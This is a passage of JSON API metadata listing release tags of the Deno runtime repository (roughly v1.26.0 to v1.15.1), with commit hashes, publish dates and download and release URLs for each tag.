/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.1